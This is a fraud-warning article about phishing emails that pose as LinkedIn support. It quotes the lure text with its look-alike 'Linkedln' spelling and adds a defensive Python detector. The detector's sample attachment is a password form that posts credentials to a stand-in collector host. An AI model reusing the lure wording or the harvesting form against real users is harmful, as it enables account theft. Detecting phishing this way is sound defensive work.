Researchers at Symantec have warned of a new wave of phishing emails claiming to come from LinkedIn’s support team that evade spam filters.
A typical email reads: “Due to irregular activities your Linkedln account has been subjected to compulsory security update. Linkedln may sometimes deny logins in cases where we believe the account could have been compromised.
To do this we developed a new secure way that keeps your account safe. we have attached a form to this email to complete the process. Please, download and follow the instructions on your screen.
Linkedln Support”.
Attached to the email is an HTML file containing a copy of the genuine LinkedIn webpage. However, the page's source has been modified so that if the recipient uses it to sign in to their LinkedIn account, their credentials are sent directly to the fraudsters.
Passing through spam filters
The email uses a lowercase “l” (L) in place of the capital “I” (i) when spelling “LinkedIn”. The difference between the characters is indiscernible to the eye, and the substitution functions as a way to evade spam mail filters.
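A defender can check for both traits described above: the look-alike brand spelling in the message body and a password form in the HTML attachment that submits somewhere other than LinkedIn. The following Python sketch is an added example, not code from Symantec or LinkedIn; the confusable-character map, the function names, the sample attachment markup and the `collector.example` host are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Characters that render like a lowercase "l" in many fonts (assumed, not exhaustive).
CONFUSABLE = str.maketrans({"I": "l", "1": "l", "|": "l"})

def skeleton(token):
    """Fold look-alike characters together, then ignore case."""
    return token.translate(CONFUSABLE).lower()

def lookalike_brand_tokens(text, brand="LinkedIn"):
    """Return words that look like the brand but are spelled with other characters."""
    target = skeleton(brand)
    return [t for t in re.findall(r"[A-Za-z0-9|]+", text)
            if skeleton(t) == target and t.lower() != brand.lower()]

class PasswordFormAudit(HTMLParser):
    """Record where each password field in an HTML attachment would be submitted."""
    def __init__(self):
        super().__init__()
        self.action = ""
        self.findings = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.action = attrs.get("action") or ""
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            host = urlparse(self.action).hostname or ""
            if host != "linkedin.com" and not host.endswith(".linkedin.com"):
                self.findings.append(host or "(no absolute action)")

def off_brand_password_posts(html):
    """Return the hosts that password fields in the markup would post to, if not LinkedIn."""
    audit = PasswordFormAudit()
    audit.feed(html)
    return audit.findings

# Constructed samples: the body wording follows the email quoted above; the
# attachment markup and the collector.example host are invented for illustration.
SAMPLE_BODY = "Due to irregular activities your Linkedln account has been subjected to compulsory security update."
SAMPLE_ATTACHMENT = """<form method="post" action="https://collector.example/session">
<input type="text" name="session_key"><input type="password" name="session_password">
</form>"""

if __name__ == "__main__":
    print(lookalike_brand_tokens(SAMPLE_BODY))
    print(off_brand_password_posts(SAMPLE_ATTACHMENT))
```

A filter that matches only the exact string “LinkedIn” misses the spoofed spelling, whereas comparing folded forms catches it without flagging the genuine name.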
Independent security expert Graham Cluley said: “Once the phishers have control of the account they can pose more convincingly as a member of your organisation, and potentially abuse the business relationships the victim has built up over time for their own criminal and fraudulent purposes.
After all, people are far more likely to trust a message which arrives in their LinkedIn inbox with a friend or colleague’s mugshot and work profile alongside it, than one which arrives out of the blue in their email intray”.
Two step verification
LinkedIn users should consider turning on two-step verification, a true “security update” that provides an extra layer of security. With two-step verification enabled, even if a user’s credentials are compromised, an attacker would not be able to log in without having access to the user’s mobile phone.
You can find out more about LinkedIn’s two-step verification by visiting its help center.
Read more on the Symantec website.
Please note: Action Fraud is not responsible for the content on external websites.
If you are a victim of fraud you can call Action Fraud on 0300 123 2040 or use our online fraud reporting tool and receive a police crime reference number.